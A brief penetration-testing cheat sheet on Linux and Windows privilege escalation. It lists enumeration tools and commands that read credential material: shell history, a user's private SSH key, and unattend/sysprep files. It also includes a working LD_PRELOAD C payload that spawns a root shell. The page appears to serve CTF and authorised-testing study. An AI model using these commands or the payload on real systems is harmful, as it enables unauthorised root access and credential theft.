Privilege Escalation

Enumeration Scripts

LinEnum
Linuxprivchecker
Seatbelt
JAWS
PEASS-ng

Techniques

Kernel Exploits

You can google known kernel exploits.

Vulnerable Software

dpkg -l

User Privileges

sudo -l

Scheduled Tasks

/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root

Exposed Credentials

cat ~/.bash_history

SSH Keys

cat /home/qu35t/.ssh/id_rsa

LD_PRELOAD

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

Windows

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

schtasks /query /tn vulntask /fo list /v

icacls c:\tasks\schtask.bat

References

GTFOBins
LOLBAS

PreviousInfrastructure Enumeration NextDocker Breakout

Last updated 2 years ago